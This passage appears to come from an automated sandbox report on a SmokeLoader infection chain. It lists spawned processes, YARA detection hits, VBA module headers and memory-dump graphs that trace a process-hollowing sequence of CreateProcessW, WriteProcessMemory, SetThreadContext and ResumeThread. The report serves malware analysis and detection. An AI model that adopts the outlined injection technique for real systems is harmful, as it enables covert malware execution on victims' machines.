                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:16
                                                      Start time:09:51:42
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\System32\taskeng.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:taskeng.exe {4EEBF1C0-00CF-4920-A83B-C678B0B7FDEB} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                                      Imagebase:0xff6a0000
                                                      File size:464'384 bytes
                                                      MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:17
                                                      Start time:09:51:42
                                                      Start date:31/08/2024
                                                      Path:C:\Users\user\AppData\Roaming\dagifhd
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\dagifhd
                                                      Imagebase:0x1080000
                                                      File size:64'704 bytes
                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 0%, ReversingLabs
                                                      • Detection: 0%, Virustotal
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:19
                                                      Start time:09:51:44
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                      Imagebase:0xa20000
                                                      File size:2'972'672 bytes
                                                      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:20
                                                      Start time:09:51:45
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\explorer.exe
                                                      Imagebase:0xff2f0000
                                                      File size:3'229'696 bytes
                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:21
                                                      Start time:09:51:46
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                      Imagebase:0xa20000
                                                      File size:2'972'672 bytes
                                                      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:22
                                                      Start time:09:51:48
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                      Imagebase:0xa20000
                                                      File size:2'972'672 bytes
                                                      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:23
                                                      Start time:09:51:49
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\explorer.exe
                                                      Imagebase:0xff2f0000
                                                      File size:3'229'696 bytes
                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:24
                                                      Start time:09:51:50
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                      Imagebase:0xa20000
                                                      File size:2'972'672 bytes
                                                      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Has exited:false

                                                      Target ID:25
                                                      Start time:09:51:51
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\explorer.exe
                                                      Imagebase:0xff2f0000
                                                      File size:3'229'696 bytes
                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000019.00000002.624527841.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Has exited:false

                                                      Target ID:26
                                                      Start time:09:51:52
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                      Imagebase:0xa20000
                                                      File size:2'972'672 bytes
                                                      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:27
                                                      Start time:09:51:53
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\explorer.exe
                                                      Imagebase:0xff2f0000
                                                      File size:3'229'696 bytes
                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false


                                                      Module: Sheet1

                                                      Declaration (line: content)
                                                      1: Attribute VB_Name = "Sheet1"
                                                      2: Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                      3: Attribute VB_GlobalNameSpace = False
                                                      4: Attribute VB_Creatable = False
                                                      5: Attribute VB_PredeclaredId = True
                                                      6: Attribute VB_Exposed = True
                                                      7: Attribute VB_TemplateDerived = False
                                                      8: Attribute VB_Customizable = True

                                                      Module: Sheet2

                                                      Declaration (line: content)
                                                      1: Attribute VB_Name = "Sheet2"
                                                      2: Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                      3: Attribute VB_GlobalNameSpace = False
                                                      4: Attribute VB_Creatable = False
                                                      5: Attribute VB_PredeclaredId = True
                                                      6: Attribute VB_Exposed = True
                                                      7: Attribute VB_TemplateDerived = False
                                                      8: Attribute VB_Customizable = True

                                                      Module: Sheet3

                                                      Declaration (line: content)
                                                      1: Attribute VB_Name = "Sheet3"
                                                      2: Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                      3: Attribute VB_GlobalNameSpace = False
                                                      4: Attribute VB_Creatable = False
                                                      5: Attribute VB_PredeclaredId = True
                                                      6: Attribute VB_Exposed = True
                                                      7: Attribute VB_TemplateDerived = False
                                                      8: Attribute VB_Customizable = True

                                                      Module: ThisWorkbook

                                                      Declaration (line: content)
                                                      1: Attribute VB_Name = "ThisWorkbook"
                                                      2: Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                      3: Attribute VB_GlobalNameSpace = False
                                                      4: Attribute VB_Creatable = False
                                                      5: Attribute VB_PredeclaredId = True
                                                      6: Attribute VB_Exposed = True
                                                      7: Attribute VB_TemplateDerived = False
                                                      8: Attribute VB_Customizable = True

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.456810896.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_16d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 87a294defd21b33167862cd80b94f4f4ba6b93f2d838b5825c9e93f79a79430b
                                                        • Instruction ID: 555807621c49832913412bf0a6eadf928a869a5ef3b5fed1801ed433bd81341b
                                                        • Opcode Fuzzy Hash: 87a294defd21b33167862cd80b94f4f4ba6b93f2d838b5825c9e93f79a79430b
                                                        • Instruction Fuzzy Hash: F2012B31A04340AAEB205E16ECC4767FF98DF81364F28C05AFC450F182C3799945CAB1
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.456810896.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_16d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 13324d03f2630c8366d8b5b404660f2ef606341924ce66049d40ddd4b5e109e0
                                                        • Instruction ID: aa40a768388a59dcc9f38af461485e3089651d3dc9e42b8c51fd1635dfba9db9
                                                        • Opcode Fuzzy Hash: 13324d03f2630c8366d8b5b404660f2ef606341924ce66049d40ddd4b5e109e0
                                                        • Instruction Fuzzy Hash: 9001526150D3C05FD7124B259C94B52BFB4DF43224F1981DBE8848F1A3C2699C48C772

                                                        Execution Graph

                                                        Execution Coverage:7.4%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:65.2%
                                                        Total number of Nodes:23
                                                        Total number of Limit Nodes:2
                                                        execution_graph 4819 304b48 4820 304b6f 4819->4820 4823 304c98 4820->4823 4824 304cc2 4823->4824 4825 304c84 4824->4825 4827 304d60 4824->4827 4828 304d93 4827->4828 4843 30172c 4828->4843 4830 304f5c 4831 301738 Wow64SetThreadContext 4830->4831 4832 30505b 4830->4832 4831->4832 4833 301774 WriteProcessMemory 4832->4833 4837 305384 4833->4837 4834 305623 4835 301774 WriteProcessMemory 4834->4835 4836 305674 4835->4836 4838 301780 Wow64SetThreadContext 4836->4838 4839 305777 4836->4839 4837->4834 4840 301774 WriteProcessMemory 4837->4840 4838->4839 4841 301798 ResumeThread 4839->4841 4840->4837 4842 305829 4841->4842 4842->4824 4844 305938 CreateProcessW 4843->4844 4846 305b2c 4844->4846 4846->4846

                                                        Control-flow Graph

                                                        control_flow_graph 337 304d60-304d91 338 304d93 337->338 339 304d98-304ece 337->339 338->339 344 304ed0 339->344 345 304ed5-304f0a 339->345 344->345 347 304f37-304f7c call 30172c 345->347 348 304f0c-304f36 345->348 352 304fa5-304fcb 347->352 353 304f7e-304f9a 347->353 348->347 356 304fd2-305014 352->356 357 304fcd 352->357 353->352 361 305016 356->361 362 30501b-305047 356->362 357->356 361->362 364 3050a8-3050d9 call 301744 362->364 365 305049-30507b call 301738 362->365 372 305102-30510c 364->372 373 3050db-3050f7 364->373 370 3050a4-3050a6 365->370 371 30507d-305099 365->371 370->372 371->370 374 305113-305136 372->374 375 30510e 372->375 373->372 377 305138 374->377 378 30513d-305181 call 301750 374->378 375->374 377->378 384 305183-30519f 378->384 385 3051aa-3051b3 378->385 384->385 386 3051b5-3051dd call 30175c 385->386 387 3051df-3051e1 385->387 389 3051e7-3051fb 386->389 387->389 392 305224-30522e 389->392 393 3051fd-305219 389->393 394 305230 392->394 395 305235-305259 392->395 393->392 394->395 399 305260-3052b2 call 301768 395->399 400 30525b 395->400 405 3052b4-3052c8 399->405 406 3052ca-3052cc 399->406 400->399 407 3052d2-3052e6 405->407 406->407 408 305323-30533d 407->408 409 3052e8-305322 call 301768 407->409 410 305366-3053a4 call 301774 408->410 411 30533f-30535b 408->411 409->408 417 3053a6-3053c2 410->417 418 3053cd-3053d7 410->418 411->410 417->418 419 3053d9 418->419 420 3053de-3053ee 418->420 419->420 422 3053f0 420->422 423 3053f5-30541d 420->423 422->423 427 305424-305433 423->427 428 30541f 423->428 429 3055fe-30561d 427->429 428->427 430 305623-30564a 429->430 431 305438-305446 429->431 436 305651-305694 call 301774 430->436 437 30564c 430->437 432 305448 431->432 433 30544d-305474 431->433 432->433 439 305476 433->439 440 30547b-3054a2 433->440 442 305696-3056b2 436->442 443 3056bd-3056c7 436->443 437->436 439->440 445 3054a4 440->445 446 3054a9-3054dd 440->446 442->443 447 3056c9 443->447 448 3056ce-3056fb 443->448 445->446 453 3054e3-3054f1 446->453 454 3055c9-3055d6 446->454 447->448 455 305708-305714 448->455 456 3056fd-305707 448->456 461 3054f3 453->461 462 3054f8-3054ff 453->462 459 3055d8 454->459 460 3055dd-3055f1 454->460 457 305716 455->457 458 30571b-30572b 455->458 456->455 457->458 463 305732-305763 458->463 464 30572d 458->464 459->460 465 3055f3 460->465 466 3055f8 460->466 461->462 467 305501 462->467 468 305506-30554e 462->468 471 3057c4-3057f5 call 30178c 463->471 472 305765-305772 call 301780 463->472 464->463 465->466 466->429 467->468 477 305550 468->477 478 305555-30557a call 301774 468->478 480 3057f7-305813 471->480 481 30581e-305824 call 301798 471->481 479 305777-305797 472->479 477->478 485 30557f-30559f 478->485 483 3057c0-3057c2 479->483 484 305799-3057b5 479->484 480->481 490 305829-305849 481->490 483->481 484->483 488 3055a1-3055bd 485->488 489 3055c8 485->489 488->489 489->454 492 305872-305915 490->492 493 30584b-305867 490->493 493->492
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453825567.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_300000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ContextMemoryProcessThreadWow64Write
                                                        • String ID:
                                                        • API String ID: 3696009080-0
                                                        • Opcode ID: 285c2cba1e5d9284b0412d0d10ec9eb74c6b69327fa2bfcd8f663e59da960f32
                                                        • Instruction ID: 62fa8a53e8618c45e2c56bb16dd7908c3f40f74182913a9d8f57187ce054ba38
                                                        • Opcode Fuzzy Hash: 285c2cba1e5d9284b0412d0d10ec9eb74c6b69327fa2bfcd8f663e59da960f32
                                                        • Instruction Fuzzy Hash: FF62D174E012288FEB65DF25C854BEEBBB2AB89301F5081EAD40DA7291DB345E85DF50

                                                        Control-flow Graph

                                                        control_flow_graph 0 210203c-210203f 1 2102041-2102043 0->1 2 2102045-210204d 0->2 1->2 3 2102065-2102069 2->3 4 210204f-2102054 2->4 5 2102194-210219e 3->5 6 210206f-2102073 3->6 7 2102055 4->7 8 2102059-2102063 4->8 9 21021a0-21021a9 5->9 10 21021ac-21021b2 5->10 11 21020b3 6->11 12 2102075-2102086 6->12 7->8 13 2102057 7->13 8->3 14 21021b4-21021b6 10->14 15 21021b8-21021c4 10->15 16 21020b5-21020b7 11->16 21 21021ec-210223b 12->21 22 210208c-2102091 12->22 13->3 19 21021c6-21021e9 14->19 15->19 16->5 20 21020bd-21020c1 16->20 20->5 24 21020c7-21020cb 20->24 35 2102241-2102246 21->35 36 210243e-210244d 21->36 25 2102093-2102099 22->25 26 21020a9-21020b1 22->26 24->5 28 21020d1-21020f7 24->28 29 210209b 25->29 30 210209d-21020a7 25->30 26->16 28->5 43 21020fd-2102101 28->43 29->26 30->26 38 2102248-210224e 35->38 39 210225e-2102262 35->39 41 2102250 38->41 42 2102252-210225c 38->42 44 21023e7-21023f1 39->44 45 2102268-210226a 39->45 41->39 42->39 47 2102103-210210c 43->47 48 2102124 43->48 51 21023f3-21023fa 44->51 52 21023fd-2102403 44->52 49 210227a 45->49 50 210226c-2102278 45->50 54 2102113-2102120 47->54 55 210210e-2102111 47->55 57 2102127-2102134 48->57 56 210227c-210227e 49->56 50->56 58 2102405-2102407 52->58 59 2102409-2102415 52->59 60 2102122 54->60 55->60 56->44 61 2102284-21022a3 56->61 64 210213a-2102191 57->64 62 2102417-210243b 58->62 59->62 60->57 71 21022b3 61->71 72 21022a5-21022b1 61->72 73 21022b5-21022b7 71->73 72->73 73->44 74 21022bd-21022c1 73->74 74->44 75 21022c7-21022cb 74->75 76 21022cd-21022dc 75->76 77 21022de 75->77 78 21022e0-21022e2 76->78 77->78 78->44 79 21022e8-21022ec 78->79 79->44 80 21022f2-2102311 79->80 83 2102313-2102319 80->83 84 2102329-2102334 80->84 87 210231b 83->87 88 210231d-210231f 83->88 85 2102343-210235f 84->85 86 2102336-2102339 84->86 89 2102361-2102374 85->89 90 210237c-2102386 85->90 86->85 87->84 88->84 89->90 91 2102388 90->91 92 210238a-21023d8 90->92 93 21023dd-21023e4 91->93 92->93
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453935898.0000000002100000.00000040.00000800.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2100000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: L4#p$L4#p$L4#p$d=<
                                                        • API String ID: 0-507092061
                                                        • Opcode ID: 33588de4f374ec5a16840d045f5a11ceb1dec5095eb3a29ff1b23add80fbd7c9
                                                        • Instruction ID: bec4626cc04b887df07b71428ce8ab0c7086e84659dcaca8ce68a556331879fa
                                                        • Opcode Fuzzy Hash: 33588de4f374ec5a16840d045f5a11ceb1dec5095eb3a29ff1b23add80fbd7c9
                                                        • Instruction Fuzzy Hash: DFB10531740208DFDF199F64C888BAE7BA2AF89314F14846AED518F2D5CBB1DD45CB92

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453935898.0000000002100000.00000040.00000800.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2100000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8#f$8#f$l;<$l;<
                                                        • API String ID: 0-535497228
                                                        • Opcode ID: 53f79b188660924564f49c67698336f99d2e8696012b712b00b25bfb1ad5f43d
                                                        • Instruction ID: 7128d597eaf004deafbb7af83c50b167e4a5aa1518b3899953a1a117f492ba5c
                                                        • Opcode Fuzzy Hash: 53f79b188660924564f49c67698336f99d2e8696012b712b00b25bfb1ad5f43d
                                                        • Instruction Fuzzy Hash: B1F15A317402059FDB299E78C8907BAB7E2AFC9310F2580BAD459DB3D1DBB1D941C7A2

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00305B17
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453825567.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_300000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 32ccdc63f38f2e59ce5e0be3b5dbea7b39711924dd41303883ab85fadd289bf7
                                                        • Instruction ID: 974ec573ccc7bc92128f7f9b55cbd813aa20e2e8fbda703d8915a4dcecaaa3b0
                                                        • Opcode Fuzzy Hash: 32ccdc63f38f2e59ce5e0be3b5dbea7b39711924dd41303883ab85fadd289bf7
                                                        • Instruction Fuzzy Hash: D381C0B4D0022D9FDB25DFA5D880BEEBBB1AF59304F0090AAE549B7250DB709E85CF54

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00305B17
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453825567.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_300000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: fc50242078307018b4571fe16a9c862471c470e446c13af973c10dc56a035495
                                                        • Instruction ID: 97d1a2b870aec862b938afc888203704ae5859011a581292c057387b25658f76
                                                        • Opcode Fuzzy Hash: fc50242078307018b4571fe16a9c862471c470e446c13af973c10dc56a035495
                                                        • Instruction Fuzzy Hash: DF81B0B4D0022D9FDB25DF65D880BEEBBB1AF49304F0090AAE549B7250DB709E85CF54

                                                        Control-flow Graph

                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0030606E
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453825567.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_300000_powershell.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 3f5f4c7a26aee23cdd1373cea239d098d7243de8199d7895e4fa41a12423f0b3
                                                        • Instruction ID: 8e070d51bc3d373f18e05c7588edf322260e31020a3046cefaa65ef45e6c8ced
                                                        • Opcode Fuzzy Hash: 3f5f4c7a26aee23cdd1373cea239d098d7243de8199d7895e4fa41a12423f0b3
                                                        • Instruction Fuzzy Hash: 1641A9B5D042589FCB00CFA9D984ADEFBF1BB09310F24902AE818B7350D375AA55CF64

                                                        Control-flow Graph

                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 00305D1A
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453825567.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_300000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 02776a7cc297a9b1e7b663056a5afae6cccac3079ace2b0ee5d5e0dc39917c38
                                                        • Instruction ID: 34a8441f4cd59e403ed353591318ad8d683a926dc871f90142d3c78e26b2c797
                                                        • Opcode Fuzzy Hash: 02776a7cc297a9b1e7b663056a5afae6cccac3079ace2b0ee5d5e0dc39917c38
                                                        • Instruction Fuzzy Hash: 39319BB5D012589FCB10CFA9D988ADEFBF5BB49314F24902AE418B7350D378AA45CF54

                                                        Control-flow Graph

                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 00305D1A
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453825567.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_300000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 1c4f779c2c15b75a5ef39ffefe322b0d5343f6d6fe2a2ce3b3fc4e2e54208f98
                                                        • Instruction ID: 28273ddc0ce7552a5b632c412e81d97be5d777c1238892dbeee83b969ca9fd91
                                                        • Opcode Fuzzy Hash: 1c4f779c2c15b75a5ef39ffefe322b0d5343f6d6fe2a2ce3b3fc4e2e54208f98
                                                        • Instruction Fuzzy Hash: B431ABB4D012589FCB10CFA9D588ADEFBF1BB49314F24802AE418B7350D378AA45CF54

                                                        Control-flow Graph

                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 00305D1A
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453825567.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_300000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 336a6fcc69342d992dee38dae77434ee5d374e391554c9b8b19337891601b124
                                                        • Instruction ID: b207b95d869a1d1d633f67f5235ed3cf619d204453daeb2f4cf80e49aa9dcf58
                                                        • Opcode Fuzzy Hash: 336a6fcc69342d992dee38dae77434ee5d374e391554c9b8b19337891601b124
                                                        • Instruction Fuzzy Hash: 6D319BB5D012589FCB10CFAAD984ADEFBF1BB49314F24802AE418B7350D378AA45CF64

                                                        Control-flow Graph

                                                        APIs
                                                        • ResumeThread.KERNELBASE(?), ref: 00306156
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453825567.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_300000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 654feb590590822bbf9e557a2c30effaf9aa7e630bbf1754a377d1d39a89713f
                                                        • Instruction ID: 9348d5c5b7bc4b16649f99e81c0afd5a59e81a75e68b0f3d3497774e21ac6873
                                                        • Opcode Fuzzy Hash: 654feb590590822bbf9e557a2c30effaf9aa7e630bbf1754a377d1d39a89713f
                                                        • Instruction Fuzzy Hash: AD21AAB8D002189FCB10CFA9D484ADEFBF4EB49310F20902AE819B7350D374A945CFA4

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453935898.0000000002100000.00000040.00000800.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2100000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 84627cd6b653bb64740f72cbbdc04634969f07a12be3d183bb89d9e2e7e2535e
                                                        • Instruction ID: 701cd088e539fa711077e3f40ba82731f4dba0c0ae860dc4259f288039eb13b7
                                                        • Opcode Fuzzy Hash: 84627cd6b653bb64740f72cbbdc04634969f07a12be3d183bb89d9e2e7e2535e
                                                        • Instruction Fuzzy Hash: 2F415C35780101FBDB294E64D4C06BAB3E1AFC1310B2881BBD8698B2D1DBF8D941C756

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453774641.00000000000ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 000ED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_ed000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7215d0e7d6f52b4814dfb155e0d314c883b77735468c284a731aded9e849790e
                                                        • Instruction ID: 82a367f25378c2ca12b3f0ff40bb9b5b0954cf5b92670303b19cb25ccb7961ab
                                                        • Opcode Fuzzy Hash: 7215d0e7d6f52b4814dfb155e0d314c883b77735468c284a731aded9e849790e
                                                        • Instruction Fuzzy Hash: 17015E6110D3C09FD7128B258C94B52BFB4DF43224F1D81DBD8889F2A3C2699C48CB72

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453774641.00000000000ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 000ED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_ed000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 364de623a5b714d9f7661d5bbcef8b3f23d5a74f7f17e8e8a67a2a9ca6249c40
                                                        • Instruction ID: 7440d1837cf65d09b2cd87ba66e3a1070fdb76e5f7eeb8a88432f109a63f53fe
                                                        • Opcode Fuzzy Hash: 364de623a5b714d9f7661d5bbcef8b3f23d5a74f7f17e8e8a67a2a9ca6249c40
                                                        • Instruction Fuzzy Hash: E301F231104380AEE7209E26C8C4B6ABBD8DF81324F1CC01BED492B282C2799941DAB1
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453935898.0000000002100000.00000040.00000800.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2100000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b621e7ca8025baa491a3807ec40e8a1cd2b9c3dcb093b08a207b25ade3c7c77e
                                                        • Instruction ID: 683905b903523b3fae9f07b5c4bfd831c3a5266afc8c23708bf6d0236b06b1ef
                                                        • Opcode Fuzzy Hash: b621e7ca8025baa491a3807ec40e8a1cd2b9c3dcb093b08a207b25ade3c7c77e
                                                        • Instruction Fuzzy Hash: E5E06831B44204AADF39662480E03EC77616FE3210F0181E6C47493285DBB88805C352
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.453935898.0000000002100000.00000040.00000800.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2100000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (:<$(:<$(:<$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:<$L:<$L:<
                                                        • API String ID: 0-3428091537
                                                        • Opcode ID: 3e342c2faa4d90fe3f534afd34c0418639300a5344bc4bf4c69e1a08ee3b8639
                                                        • Instruction ID: 37fbcc2889f03db948ad6ca2ee6d64ed6dabe31ae3fe39a39051f23574c210aa
                                                        • Opcode Fuzzy Hash: 3e342c2faa4d90fe3f534afd34c0418639300a5344bc4bf4c69e1a08ee3b8639
